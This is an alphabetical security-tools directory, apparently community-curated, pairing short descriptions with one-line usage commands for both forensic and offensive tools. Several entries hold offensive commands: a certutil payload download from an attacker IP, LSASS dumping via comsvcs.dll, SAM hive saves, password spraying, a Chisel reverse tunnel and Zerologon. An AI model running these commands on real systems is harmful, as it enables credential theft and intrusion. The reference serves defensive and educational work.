Enumeration Red Team

A writable directory earlier in $PATH than the real binary lets a planted script hijack any command a privileged user runs by name.

echo $PATH | tr ':' '\n' | xargs -I{} sh -c 'test -w "{}" && echo "writable: {}"'
added by THUGS(red)

Check periodic maintenance script hooks one-liner macOS

Enumeration Forensics

/etc/periodic is an older but still-functional persistence point inherited from macOS BSD lineage, checked less often than LaunchAgents.

ls -la /etc/periodic/daily /etc/periodic/weekly /etc/periodic/monthly
added by THUGS(red)

Check Run/RunOnce persistence keys one-liner Windows

Blue Team Forensics

Blue-team sweep of the classic autorun keys that survive reboot, the first place most simple malware persists.

reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce"
added by THUGS(red)

Check shell profile files for injected persistence one-liner macOS

Blue Team Forensics

A malicious line appended to .zshrc or .bash_profile re-executes on every new terminal session, a common and easily missed persistence spot.

cat ~/.zshrc ~/.zprofile ~/.bash_profile ~/.bashrc 2>/dev/null
added by THUGS(red)

Check System Integrity Protection status one-liner macOS

Blue Team Enumeration

SIP being disabled removes a large set of macOS built-in tamper protections, and legitimate reasons to disable it outside development are rare.

csrutil status
added by THUGS(red)

Check systemd services for a writable ExecStart path one-liner Linux

Enumeration Red Team

A unit whose ExecStart binary sits in a directory the current user can write to is a straightforward path to root on the next service restart.

systemctl list-unit-files --type=service --state=enabled | awk '{print $1}' | xargs -I{} sh -c 'systemctl cat {} 2>/dev/null | grep ExecStart'
added by THUGS(red)

Check the ambient capability bounding set one-liner Linux

Enumeration Red Team

capsh shows exactly which capabilities the current shell holds, which decides whether a capability-based privesc path is even viable.

capsh --print
added by THUGS(red)

Check the application firewall status one-liner macOS

Blue Team Enumeration Network

Confirms whether the built-in packet filter is even enabled before drawing any conclusion from an absence of blocked-connection logs.

/usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate
added by THUGS(red)

Check the current user crontab one-liner macOS

Blue Team Enumeration

cron still works on macOS even though launchd is preferred, and it is checked less often, exactly why it is occasionally used for persistence.

crontab -l
added by THUGS(red)

Check the quarantine attribute on a download one-liner macOS

Blue Team Forensics

The com.apple.quarantine extended attribute is what triggers the "are you sure you want to open this" prompt, worth checking in any investigation.

xattr -l ~/Downloads/suspicious.dmg
added by THUGS(red)

Check the sudoers file for weak rules one-liner macOS

Enumeration Red Team

A NOPASSWD entry or an overly broad command wildcard in /etc/sudoers is exactly as dangerous on macOS as on any other Unix.

sudo cat /etc/sudoers /etc/sudoers.d/*
added by THUGS(red)

Check what has Full Disk Access / TCC grants one-liner macOS

Blue Team Forensics

Reads macOS's TCC (Transparency, Consent and Control) database to show which apps were granted access to sensitive data — a common forensic/incident-response first step.

sqlite3 ~/Library/Application\ Support/com.apple.TCC/TCC.db "select client,auth_value,service from access;"
added by THUGS(red)

Check Windows Defender exclusions one-liner Windows

Blue Team Enumeration Red Team

An exclusion path readable by a low-privileged user shows exactly where to drop a payload Defender will never scan.

Get-MpPreference | Select-Object ExclusionPath, ExclusionExtension, ExclusionProcess
added by THUGS(red)

Checkov tool

Blue Team Cloud Defensive

Bridgecrew/Palo Alto's static analysis scanner for infrastructure-as-code — flags insecure defaults in Terraform, CloudFormation, Kubernetes manifests, ARM and Dockerfiles before they're deployed.

checkov -d ./terraform
visit → added by THUGS(red)

checksec.sh tool Linux

Binary / RE CTF

Reports which exploit mitigations (NX, PIE, RELRO, canaries, stripped symbols) a binary was built with — the first command run against any new pwn challenge.

checksec --file=./chall
visit → added by THUGS(red)

ChipWhisperer tool

Hardware Research

Open-source side-channel power analysis and voltage/clock glitching platform (hardware + Python toolchain) for practical hands-on work with fault injection and DPA, not just theory.

visit → added by THUGS(red)

Chisel tool

Network Red Team

A fast TCP/UDP tunnel over HTTP, written in Go — the go-to tool for pivoting into a network segment you can otherwise only reach through one compromised host.

# attacker: chisel server -p 8000 --reverse\n# target:  ./chisel client 10.10.14.7:8000 R:socks
visit → added by THUGS(red)

Ciphey tool

Ciphers Cryptography CTF

Automated decoding tool that tries to work out what encoding or cipher was used on a blob of text (base64, ROT13, Vigenère, hashes, and combinations of them) without being told.

ciphey -t "encrypted text"
visit → added by THUGS(red)

CISA Known Exploited Vulnerabilities Catalog tool

Defensive Research

The US government's list of CVEs confirmed to be actively exploited in the wild, used to prioritise patching over raw CVSS score alone.

visit → added by THUGS(red)

Clair tool

Blue Team Cloud Defensive

Open-source static vulnerability analysis for container images — the scanner behind Quay.io, indexes image layers and matches against multiple CVE feeds.

visit → added by THUGS(red)

class-dump tool macOS

Binary / RE Mobile

Generates Objective-C header files from a compiled Mach-O binary, exposing an iOS app or framework's class/method structure without source — the starting point for most iOS reversing.

class-dump -H MyApp.app/MyApp -o headers/
visit → added by THUGS(red)

Cloud Custodian tool

Blue Team Cloud Defensive

Capital One's rules engine for cloud governance — YAML policies describe the compliant state you want, and it can report, alert or automatically remediate drift across AWS/Azure/GCP.

custodian run -s output/ policy.yml
visit → added by THUGS(red)

Cloud Katana tool

Blue Team Cloud Defensive

Microsoft's serverless tool for running attack simulation scenarios in Azure — executes ATT&CK-mapped techniques to validate that detections and alerts fire as expected.

visit → added by THUGS(red)

cloud_enum tool

Cloud Enumeration Recon

Multi-cloud OSINT tool that enumerates public storage buckets, apps and resources across AWS, Azure and GCP for a given keyword or company name.

python3 cloud_enum.py -k example
visit → added by THUGS(red)

CloudBrute tool

Cloud Enumeration Recon

Brute-forces likely bucket/storage-account names across AWS, Azure, GCP, DigitalOcean and other providers to find exposed cloud storage tied to a target company or brand.

cloudbrute -d example -k "example,exampleco" -o output.txt
visit → added by THUGS(red)

CloudFox tool

Blue Team Cloud Enumeration

Bishop Fox's situational-awareness tool for AWS, Azure and GCP — quickly maps what an account/role can do and where sensitive resources sit, used by both attackers and defenders auditing exposure.

cloudfox aws all-checks
visit → added by THUGS(red)

CloudMapper tool

Cloud Recon Whitebox

Generates network diagrams of AWS environments from live account data, helping identify unexpected public exposure across VPCs and security groups.

python3 cloudmapper.py collect --account example
visit → added by THUGS(red)

CloudShark tool

Blue Team Network

Web-based pcap analysis and sharing platform — upload a capture, get a shareable link with a full protocol decode, annotations and export, for collaborating on a capture without emailing it around.

visit → added by THUGS(red)

CloudSplaining tool

Blue Team Cloud Defensive

Identifies violations of least privilege in AWS IAM policies (e.g. privilege escalation, resource exposure, data exfiltration paths) and produces a browsable risk report.

cloudsplaining download\ncloudsplaining scan --input-file default.json
visit → added by THUGS(red)

CloudSploit tool

Blue Team Cloud Defensive

Cloud configuration scanner (now part of Aqua) for AWS/Azure/GCP/OCI — detects common misconfigurations across dozens of services with a plugin-based check engine.

visit → added by THUGS(red)

Coercer tool

Offensive Red Team

Automates testing a Windows host for every known authentication-coercion method (PetitPotam and its many siblings) in one run, rather than trying each RPC method by hand.

coercer coerce -u user -p pass -d domain.local -t 10.10.10.10 -l 10.10.14.7
visit → added by THUGS(red)

Commix tool

Payloads Red Team Web

Automates detection and exploitation of OS command-injection vulnerabilities in web parameters, the command-injection equivalent of sqlmap.

commix --url="https://target.tld/ping?host=127.0.0.1"
visit → added by THUGS(red)

Common Crawl tool

Recon Research Search Engines

Open, petabyte-scale repository of web crawl data, usable to find historical pages, linking patterns or exposed content at a scale no single scraper could reach.

visit → added by THUGS(red)

Companies House tool

OSINT Research

The UK's official company registry — filings, officers, ownership and accounts for every UK-registered company, free to search and download.

visit → added by THUGS(red)

Compute and compare a file hash against a known-bad list one-liner

Blue Team Forensics Malware

Quick manual triage step before uploading a sample anywhere — hash it locally and grep against a downloaded IOC list (e.g. exported from MISP/ThreatFox) offline.

sha256sum suspicious.bin | tee /dev/stderr | cut -d' ' -f1 | grep -Ff known_bad_hashes.txt && echo MATCH
added by THUGS(red)

Conpot tool Linux

Blue Team Hardware Network

ICS/SCADA honeypot emulating industrial protocols (Modbus, S7comm, etc.) and PLC device fingerprints, to detect and study attacks against industrial control systems.

conpot -t default
visit → added by THUGS(red)

Convert a binary plist to readable text one-liner macOS

Forensics

Most macOS configuration and persistence artifacts are binary plists; this makes them greppable like any other text file.

plutil -convert xml1 -o - ~/Library/Preferences/com.apple.suspicious.plist
added by THUGS(red)

Corellium tool

Mobile Research

Cloud-hosted virtual iOS and Android devices with full root/jailbreak-equivalent access, used for mobile security research at scale where physical jailbroken hardware does not.

visit → added by THUGS(red)

CorporationWiki tool

OSINT Research

Free US business and officer relationship search, useful for mapping which people sit on multiple company registrations.

visit → added by THUGS(red)

Cortex tool

Blue Team Defensive Malware

TheHive project's observable-analysis engine — runs analyzers (VirusTotal, abuse.ch, MISP, sandbox lookups, etc.) against IOCs on demand or from a case.

visit → added by THUGS(red)

Covenant tool Windows

Offensive Payloads Red Team

.NET C2 framework with a web-based teamserver, used to showcase and test .NET tradecraft and AMSI/ETW evasion techniques against Windows targets.

visit → added by THUGS(red)

Cowrie tool Linux

Blue Team Defensive Network

A medium-interaction SSH and Telnet honeypot — logs brute-force attempts and full attacker shell sessions, and can fake a filesystem convincingly enough to capture what a bot or human does after it "gets in".

visit → added by THUGS(red)

crackle tool

Cryptography Wireless / WiFi

Cracks the BLE Legacy Pairing key exchange from a captured connection and decrypts the traffic — the classic demonstration of why "Just Works" BLE pairing is not actually secure.

crackle -i capture.pcap -o decrypted.pcap
visit → added by THUGS(red)

CrackMapExec (legacy) tool Linux

Network Offensive Red Team

The original Active Directory assessment swiss-army-knife that NetExec forked from — still widely referenced in write-ups and older tooling even though NetExec is the maintained successor.

crackmapexec smb 10.10.10.0/24 -u user -p pass
visit → added by THUGS(red)

crackmes.one tool

Binary / RE CTF Research

Community-maintained repository of "crackmes" — small deliberately-obfuscated binaries for practicing reverse engineering, searchable by language, platform and difficulty.

visit → added by THUGS(red)

CrackStation tool

Hashing Wordlists

Free online lookup of a hash against a precomputed table of billions of cracked passwords — worth trying before spinning up hashcat for an unsalted common hash.

visit → added by THUGS(red)

CredMaster tool Linux

Brute Force Cloud Red Team

Rotates password-spray traffic through cloud provider IPs (via FireProx-style API Gateway proxying) so login attempts against Okta/O365/OWA are not all seen from one source IP.

python3 credmaster.py -m O365 -u users.txt -p Summer2026! -s okta
visit → added by THUGS(red)

creepy tool

OSINT Recon

Geolocation OSINT tool that aggregates geotagged social-media posts for a target into a mapped timeline, a historically significant project in this space.

visit → added by THUGS(red)

Criminal IP tool

Device Search OSINT Recon Search Engines

Threat-intel-flavoured internet asset search engine combining Shodan-like banner search with IP risk scoring, phishing/malicious-URL lookups and domain intel.

visit → added by THUGS(red)

crontab -l for every user, in one line one-liner Linux

CTF Enumeration Red Team

A quick privesc check: scheduled jobs run as another (often more privileged) user are a common escalation path if their script or binary is writable by you.

for u in $(cut -f1 -d: /etc/passwd); do echo "== $u =="; sudo -u "$u" crontab -l 2>/dev/null; done
added by THUGS(red)

Cross-platform: list listening ports and owning process one-liner

Blue Team Forensics Network

The first thing to run on any box during triage — what is listening, and what process owns it. Works the same shape on Linux and Windows.

# Linux
ss -ltnp
# Windows (PowerShell)
Get-NetTCPConnection -State Listen | Select-Object LocalAddress, LocalPort, OwningProcess
added by THUGS(red)

CrossLinked tool

Enumeration OSINT Recon

Enumerates a company's LinkedIn employees via search-engine scraping (no LinkedIn login needed) and outputs plausible email addresses from the naming pattern.

python3 crosslinked.py -f "{first}.{last}@example.com" example.com
visit → added by THUGS(red)

CrowdSec tool

Blue Team Defensive Network

A crowdsourced, behaviour-based intrusion detection and prevention engine — parses local logs for attack patterns and shares/consumes IP reputation with a global community, so one deployment benefits from every other one.

cscli decisions add --ip 1.2.3.4 --duration 24h --reason "manual ban"
visit → added by THUGS(red)

crt.sh tool

DNS OSINT Recon

A free, searchable front-end over Certificate Transparency logs — the fastest way to enumerate every subdomain that has ever had a public TLS certificate issued for it.

curl -s 'https://crt.sh/?q=%.target.tld&output=json' | jq -r '.[].name_value' | sort -u
visit → added by THUGS(red)

crt.sh alternative: Merklemap tool

DNS Enumeration OSINT Recon

Certificate transparency search engine indexing CT logs for domain and subdomain discovery, with a faster/more filterable UI than crt.sh for large result sets.

visit → added by THUGS(red)

Cryptii tool

Ciphers CTF

Browser-based pipeline editor for chaining encodings and classical ciphers (base64, Caesar, Morse, binary, and more) to decode a multi-layered CTF puzzle step by step.

visit → added by THUGS(red)

CryptoHack tool

Cryptography CTF Research

Gamified platform for learning cryptography by breaking progressively harder CTF-style crypto challenges, from classical ciphers through RSA, ECC and modern primitives.

visit → added by THUGS(red)

CrypTool 2 tool Windows

Ciphers Cryptography Research

Visual, drag-and-drop workbench for building cryptanalysis pipelines — includes ready-made attacks on historical ciphers (Enigma, Vigenère, classical substitution) alongside modern crypto demos.

visit → added by THUGS(red)

CTF Field Guide tool

Cheat Sheets CTF Research

Trail of Bits' long-running reference covering pwn, reversing, crypto and steganography techniques for CTF play — dated in places but still a solid first read for each category.

visit → added by THUGS(red)

ctf-tools tool Linux

Binary / RE CTF

Zardus's collection of install scripts for a wide range of CTF tools, used to quickly provision a fresh box with a working pwn/RE toolchain instead of installing everything by hand.

./ctf-tools/pwntools/install.sh
visit → added by THUGS(red)

CTFd tool

CTF

The most widely used open-source platform for running a CTF competition — challenges, scoreboard, teams and hints — the base most community CTFs deploy rather than build from scratch.

visit → added by THUGS(red)

CubicSDR tool

Hardware SDR / RF

Cross-platform general-purpose SDR receiver GUI aimed at being simpler to get running than SDR#/GQRX on any given OS, with a spectrum/waterfall view and basic demodulation.

visit → added by THUGS(red)

Cuckoo Sandbox tool Linux

Blue Team Malware

The original open-source automated malware analysis sandbox — detonates a sample in an instrumented VM and reports API calls, network traffic, dropped files and screenshots.

cuckoo submit suspicious.exe
visit → added by THUGS(red)

CUPP tool

Brute Force OSINT Wordlists

Common User Passwords Profiler — interviews you about a target's personal details (name, pet, birthdate) and generates a targeted candidate password list from the answers.

cupp -i
visit → added by THUGS(red)

Cutter tool

Binary / RE CTF

Qt GUI built on top of Rizin, giving radare2-family analysis a graph view, decompiler panes and debugger without living in the r2 command line.

visit → added by THUGS(red)

CVE Details tool

Research

Browsable, filterable front-end over CVE/NVD data — search by vendor, product, version or vulnerability type, with year-over-year trend statistics per product.

visit → added by THUGS(red)

CVE-2020-1472 (Zerologon) exploit tool Linux

Offensive Red Team

Secura's reference exploit for Zerologon — resets a Domain Controller's machine account password to empty via the Netlogon protocol, effectively taking over the domain.

python3 zerologon_tester.py DC01 10.10.10.5
visit → added by THUGS(red)

CVE.org tool

Research

The CVE Program's own record site — the canonical assignment authority database, distinct from NVD's enriched CVSS/CPE layer on top of the same IDs.

visit → added by THUGS(red)

CyberChef tool

Ciphers Cryptography CTF Forensics

GCHQ's "Cyber Swiss Army Knife" — a browser-based drag-and-drop pipeline for encoding, decoding, encryption and data-format transforms, arguably the single most-used CTF crypto/forensics tool there is.

visit → added by THUGS(red)

CyLR tool Windows

Blue Team Forensics

Live-response collector that grabs a fixed set of forensic artifacts (MFT, registry, event logs, prefetch…) from a running Windows system into a single zip, without needing to shut it down.

CyLR.exe -od C:\evidence
visit → added by THUGS(red)

Datasploit tool

OSINT Recon

OSINT framework that aggregates information about domains, emails, usernames and phone numbers from multiple public sources into one report.

visit → added by THUGS(red)

DBLP tool

Research Search Engines

Comprehensive bibliography database of computer-science publications, the standard way to trace an author's full publication history or a paper's exact venue and year.

visit → added by THUGS(red)

dc3dd tool Linux

Blue Team Forensics

The DoD Cyber Crime Center's forensic fork of GNU dd — adds on-the-fly hashing, progress reporting, split output and error logging that a plain dd lacks, for making verifiable evidentiary disk images.

dc3dd if=/dev/sdb hash=sha256 log=image.log of=image.dd
visit → added by THUGS(red)

dcfldd tool Linux

Blue Team Forensics

Another forensics-focused dd variant (originally DoD Computer Forensics Lab) — hashing, status output and multiple simultaneous output files during acquisition.

dcfldd if=/dev/sdb of=image.dd hash=sha256 hashlog=image.sha256
visit → added by THUGS(red)

dCode.fr tool

Cheat Sheets Ciphers CTF

Enormous library of online solvers and identifiers for classical ciphers, encodings and CTF-favourite puzzle formats — often the fastest way to identify what you are even looking at.

visit → added by THUGS(red)

ddrescue (GNU ddrescue) tool Linux

Blue Team Forensics

Data recovery tool built to image failing drives — reads good sectors first and retries bad ones intelligently, maximising recovered data from a dying disk.

ddrescue -f -n /dev/sdb image.dd image.log
visit → added by THUGS(red)

de4dot tool Windows

Binary / RE CTF

Deobfuscator for .NET assemblies that recognises and reverses common obfuscators (ConfuserEx, Babel, etc), a frequent prerequisite before a .NET CTF binary can be decompiled cleanly.

de4dot ./chall.exe
visit → added by THUGS(red)

Decode base64 with certutil one-liner Windows

LOLBAS / LOTL Payloads

certutil doubles as a portable base64 decoder, useful when nothing else on the box will decode a payload.

certutil -decode encoded.b64 decoded.exe
visit → added by THUGS(red)

decompyle3 tool

Binary / RE CTF

Python bytecode decompiler for 3.7-3.8 .pyc files — turns a compiled Python challenge back into readable source.

decompyle3 challenge.pyc
visit → added by THUGS(red)

DeepBlueCLI tool Windows

Blue Team Enumeration Forensics

A SANS PowerShell module that hunts Windows Event Logs for signs of attack — obfuscated PowerShell, suspicious account use, service creation — the kind of manual EVTX review a threat hunter would otherwise do by hand.

.\DeepBlue.ps1 -log security
visit → added by THUGS(red)

DEF CON Media Archives tool

Research

Archive of past DEF CON talk slides, whitepapers and video, going back to the conference's early years — a large chunk of applied security research history.

visit → added by THUGS(red)

DefaultCreds-cheat-sheet tool

Brute Force Cheat Sheets

A maintained, searchable reference of default usernames/passwords for hundreds of network appliances, admin panels and IoT devices, saving a wiki-diving detour mid-engagement.

visit → added by THUGS(red)

DeHashed tool

OSINT Research

Paid breach-data search engine indexing leaked credential dumps, searchable by email, username, IP, name or password hash — used for credential-exposure investigations.

visit → added by THUGS(red)

DeimosC2 tool

Offensive Payloads Red Team

Go-based, open-source C2 framework with a web UI, aimed at giving smaller red teams a free alternative to commercial platforms.

visit → added by THUGS(red)

Demiguise tool

Payloads Red Team

Generates HTA payloads that decrypt in-browser, defeating static-file AV scanning that never executes the page's own script.

python demiguise.py -f meter.hta -o out.hta -e something.js
visit → added by THUGS(red)

Detect a newly added Defender exclusion one-liner Windows

Blue Team Forensics

Event ID 5007 fires whenever Defender configuration changes, the fastest way to notice someone quietly whitelisting their own tooling.

Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Windows Defender/Operational'; Id=5007}
added by THUGS(red)

Detect encoded PowerShell command lines one-liner Windows

Blue Team Forensics

-enc / -EncodedCommand is one of the most common obfuscation techniques seen in both commodity malware and offensive tooling.

Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} | Where-Object { $_.Message -match '-enc(odedcommand)?\s' }
added by THUGS(red)

Detect It Easy (DIE) tool

Binary / RE CTF Malware

Signature-based packer, compiler and file-type identifier for PE/ELF/Mach-O binaries — the modern, actively maintained successor to PEiD for "what packed this".

diec ./sample.exe
visit → added by THUGS(red)

Detect LSASS access from an unusual process one-liner Windows

Blue Team Forensics

Sysmon Event ID 10 with a GrantedAccess mask like 0x1010 or 0x1438 against lsass.exe is the standard signature of a credential-dumping attempt.

Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; Id=10} | Where-Object { $_.Message -match 'lsass.exe' }
added by THUGS(red)

Detect registry hive dumping one-liner Windows

Blue Team Forensics

Security Event 4656 against HKLM\SAM is a strong indicator of an offline credential-dumping attempt via reg save.

Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4656} | Where-Object { $_.Message -match 'SAM' }
added by THUGS(red)

Detect scheduled task creation events one-liner Windows

Blue Team Forensics

schtasks /create is a common way both attackers and legitimate admin tooling establish persistence; logging the event catches both.

Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4698}
added by THUGS(red)

DetectionLab tool

Blue Team Defensive

A Vagrant/Packer-built lab that stands up a small Windows Active Directory environment pre-wired with Splunk, Sysmon and Windows Event Forwarding — a ready-made range for practicing detection engineering and threat hunting.

visit → added by THUGS(red)

DeTT&CT tool

Blue Team Defensive

Rabobank's toolset for scoring data source visibility, detection coverage and threat-actor relevance against the MITRE ATT&CK matrix, to prioritise where to build detections next.

visit → added by THUGS(red)

dex2jar tool

Binary / RE Mobile

Converts Android's Dalvik .dex bytecode into a standard .jar so ordinary Java decompilers (JD-GUI, Bytecode Viewer) can read it.

d2j-dex2jar.sh app.apk
visit → added by THUGS(red)

DFIR-ORC tool Windows

Blue Team Forensics

ANSSI's forensic artifact collection tool for Windows — configurable, digitally-signed collectors gather volatile and on-disk evidence at scale across an enterprise.

visit → added by THUGS(red)

Diaphora tool

Binary / RE CTF

Advanced binary diffing plugin for IDA/Ghidra with more heuristics than BinDiff for matching renamed or restructured functions across versions.

visit → added by THUGS(red)

dieharder tool Linux

Cryptography

A more rigorous battery of statistical randomness tests than ent, used to characterise a suspiciously weak or predictable PRNG behind a CTF crypto challenge.

dieharder -a -g 201 -f random_output.bin
visit → added by THUGS(red)

Dionaea tool Linux

Blue Team Malware Network

A honeypot built to be exploited — emulates vulnerable network services (SMB, HTTP, FTP, MSSQL and more) specifically to capture the malware payloads that automated worms and bots drop when they try to exploit it.

visit → added by THUGS(red)

DIRB tool

Brute Force Fuzzing Web

A web content scanner that looks for existing (and hidden) objects by bruteforcing a wordlist against a target — one of the original tools in this space, still bundled in Kali.

dirb http://target/ /usr/share/wordlists/dirb/common.txt
visit → added by THUGS(red)

Dissect tool

Blue Team Forensics

Fox-IT's forensic framework for parsing disk images and filesystem artifacts at scale without mounting them — a Python toolkit built for automating triage across hundreds of acquisitions rather than one investigator, one image.

target-query disk.vmdk -f mft --csv
visit → added by THUGS(red)

DNSChef tool

DNS MITM Red Team

A configurable DNS proxy for penetration testers — redirects specific domains to attacker-controlled infrastructure, the DNS half of a phishing or MITM lab setup.

dnschef --fakeip 10.10.14.7 --fakedomains target.tld
visit → added by THUGS(red)

DNSDumpster tool

DNS OSINT Recon

Free web-based domain research tool that maps a domain's DNS records, subdomains and hosting relationships, with a graphical network map.

visit → added by THUGS(red)

dnsenum tool Linux

DNS Enumeration Recon

A classic Perl DNS enumeration tool — zone transfers, MX/NS/A record lookups, Google scraping for subdomains and brute-force, bundled into one script that predates most of the newer Go-based DNS tools.

dnsenum example.com
visit → added by THUGS(red)

DNSlytics tool

DNS OSINT Recon

Reverse-lookup service for Google Analytics/AdSense IDs, nameservers and shared IPs — surfaces other domains run by the same operator even when WHOIS is hidden.

visit → added by THUGS(red)

dnSpy tool Windows

Binary / RE CTF

.NET assembly debugger, editor and decompiler in one — lets you set breakpoints and edit method bodies live inside a decompiled .NET binary, common in CTF "unmanaged reversing" of C# challenges.

visit → added by THUGS(red)

dnSpy (dnSpyEx) tool Windows

Binary / RE CTF

.NET assembly editor, debugger and decompiler in one — edit IL or C# in place and re-save the assembly. The dnSpyEx fork carries on the original, now-archived dnSpy project.

visit → added by THUGS(red)

dnSpyEx tool Windows

Binary / RE Blue Team Malware

Community-maintained continuation of dnSpy — a .NET assembly editor, debugger and decompiler, the standard tool for analysing .NET malware and unpacking .NET loaders.

visit → added by THUGS(red)

dnsrecon tool

DNS Enumeration Recon

A Python DNS enumeration and reconnaissance tool covering standard record enumeration, zone transfers, SRV record checks, reverse lookups over a range and Google/Bing subdomain scraping in one tool.

dnsrecon -d example.com -t std,brt
visit → added by THUGS(red)

dnstwist tool

Defensive DNS OSINT

Generates and checks likely typosquatted, homoglyph and bit-flipped variations of a domain name — the standard tool for detecting phishing/brand-impersonation domains registered against a company before a takedown is needed.

dnstwist --registered example.com
visit → added by THUGS(red)

DNSViz tool

Blue Team Defensive DNS

Visualises and diagnoses a domain's DNS and DNSSEC delegation chain — spots misconfigurations that would otherwise show up only as intermittent, hard-to-explain resolution failures.

visit → added by THUGS(red)

dnsx tool

DNS Enumeration Recon

A fast, multi-purpose DNS toolkit from ProjectDiscovery — bulk resolution, wildcard filtering and record-type querying built for piping into and out of the rest of that project's recon tool chain.

subfinder -d example.com | dnsx -a -resp
visit → added by THUGS(red)

Docker Bench for Security tool Linux

Blue Team Cloud Defensive

Checks a Docker host and its running containers against the CIS Docker Benchmark — a fast, scripted way to see how far a host configuration is from the recommended baseline.

docker run --rm --net host --pid host --cap-add audit_control -v /var/lib:/var/lib:ro -v /var/run/docker.sock:/var/run/docker.sock:ro docker/docker-bench-security
visit → added by THUGS(red)

dog tool

DNS Network

Modern command-line DNS client with colourised, readable output and DNS-over-HTTPS/TLS support, a friendlier drop-in for everyday dig usage.

dog example.com MX @1.1.1.1
visit → added by THUGS(red)

doggo tool

DNS Network

Command-line DNS client supporting DoH, DoT and DoQ with human-readable, colourised output — similar niche to dog, written in Go.

doggo example.com @https://1.1.1.1/dns-query
visit → added by THUGS(red)

Domain user and group enumeration with net one-liner Windows

Enumeration Red Team

No extra tooling required: net.exe against a domain controller lists users and privileged groups using only built-in binaries.

net user /domain
net group "Domain Admins" /domain
added by THUGS(red)

DomainPasswordSpray tool Windows

Brute Force Red Team

Pulls the live user list and password policy straight from Active Directory before spraying, so lockout thresholds are respected automatically.

Invoke-DomainPasswordSpray -Password Summer2026! -OutFile sprayed.txt
visit → added by THUGS(red)

DomainTools DNSDB tool

DNS Research

Historical passive-DNS database (the former Farsight DNSDB) that tracks every observed DNS record over time, used to see what a domain resolved to in the past.

visit → added by THUGS(red)

DomainTools WHOIS tool

DNS OSINT Recon

WHOIS lookup and historical WHOIS record database, widely used for domain ownership research and infrastructure attribution even after WHOIS privacy became the default.

visit → added by THUGS(red)

DonPAPI tool Linux

Offensive Red Team

Remotely dumps and decrypts Windows DPAPI-protected secrets (saved browser/RDP/Wi-Fi credentials, Credential Manager blobs) across a fleet of hosts.

donpapi collect -d corp.local -u user -p pass -t 10.10.10.0/24
visit → added by THUGS(red)

Donut tool Windows

Payloads Red Team

Converts a .NET assembly, PE, VBS or PowerShell script into position-independent shellcode that can be injected into any Windows process, a common last-mile step in loader chains.

donut -i implant.exe -o loader.bin
visit → added by THUGS(red)

dorkbot tool

OSINT Recon

Runs a set of search-engine dork queries and feeds the resulting URLs into a scanning module, chaining discovery and light vulnerability checks in one tool.

dorkbot -i google -q "inurl:admin" -s xss_scanner
visit → added by THUGS(red)

Download a file with certutil one-liner Windows

LOLBAS / LOTL Payloads Red Team

Uses the built-in, code-signed certutil.exe to fetch a remote file without touching PowerShell, a classic LOLBAS download technique.

certutil.exe -urlcache -split -f http://10.10.14.7/payload.exe payload.exe
visit → added by THUGS(red)

DRAKVUF tool Linux

Blue Team Malware

Agentless dynamic malware analysis system built on Xen VMI — observes a sample from outside the guest, so it leaves no in-guest artifacts for anti-analysis code to detect.

visit → added by THUGS(red)

Drozer tool

Enumeration Mobile Red Team

Android security assessment framework built around an in-app agent — enumerate and interact with exported activities, content providers, services and broadcast receivers from a console.

drozer console connect
visit → added by THUGS(red)

DSD (Digital Speech Decoder) tool Linux

Research SDR / RF

Decodes common digital voice radio protocols (P25, DMR, D-STAR, NXDN and more) from a demodulated audio stream, typically fed by rtl_fm.

rtl_fm -f 154.6M -s 48000 | dsd -i - -o /dev/null
visit → added by THUGS(red)

Dump a domain defaults for persistence artifacts one-liner macOS

Forensics

defaults read on an unfamiliar bundle ID can reveal configuration a piece of adware or malware wrote to persist its own settings.

defaults read com.apple.suspicious 2>/dev/null
added by THUGS(red)

Dump active AWS IAM keys and their last-used date one-liner

Blue Team Cloud Enumeration

Finds forgotten or stale IAM access keys across an AWS account — a common cloud hygiene gap and a fast win during a cloud security review.

aws iam generate-credential-report
aws iam get-credential-report --query 'Content' --output text | base64 -d
added by THUGS(red)

Dump every autostart registry Run key at once one-liner Windows

Blue Team Defensive Forensics

Quick manual persistence check across the four most commonly abused Run/RunOnce keys, without needing Autoruns installed on the box.

reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Run"
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce"
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"
added by THUGS(red)

Dump every URL the Wayback Machine has archived for a domain one-liner

OSINT Recon

Lists historical URLs archived under a domain via the CDX API, useful for finding old parameters, endpoints or files that were later removed from the live site.

curl -s "http://web.archive.org/cdx/search/cdx?url=*.example.com/*&output=text&fl=original&collapse=urlkey"
visit → added by THUGS(red)

Dump loaded kernel modules one-liner Linux

Blue Team Forensics Malware

An unfamiliar or unsigned module in the list is one of the more reliable signs of a kernel-level rootkit.

lsmod | sort
added by THUGS(red)

Dump LSASS memory via comsvcs.dll one-liner Windows

LOLBAS / LOTL Red Team

The MiniDump export inside the built-in comsvcs.dll can be invoked through rundll32 to dump a process, including LSASS, without a separate tool.

rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\Windows\Temp\lsass.dmp full
visit → added by THUGS(red)

Dump SAM/SYSTEM hives for offline cracking one-liner Windows

Hashing Red Team

reg save copies live registry hives to disk so they can be pulled offline and fed to a secrets-dumping tool, no third-party dumper required to obtain them.

reg save HKLM\SAM C:\Windows\Temp\sam.save
reg save HKLM\SYSTEM C:\Windows\Temp\system.save
added by THUGS(red)

Dump the macOS keychain item list (needs the password) one-liner macOS

Forensics Red Team

security is the built-in macOS CLI for keychain access — useful for authorised credential-recovery/incident-response work; it still prompts for the keychain password per item unless already unlocked.

security dump-keychain -d ~/Library/Keychains/login.keychain-db
added by THUGS(red)

EAPHammer tool Linux

Offensive Red Team Wireless / WiFi

Targeted rogue-AP toolkit for attacking WPA2-Enterprise networks — evil twin EAP portals to harvest credentials or relay them, plus PMKID/handshake capture for the WPA2-PSK case.

./eaphammer -i wlan0 --channel 6 --auth wpa-eap --essid CorpWiFi --creds
visit → added by THUGS(red)

Elastic Security tool

Blue Team Defensive

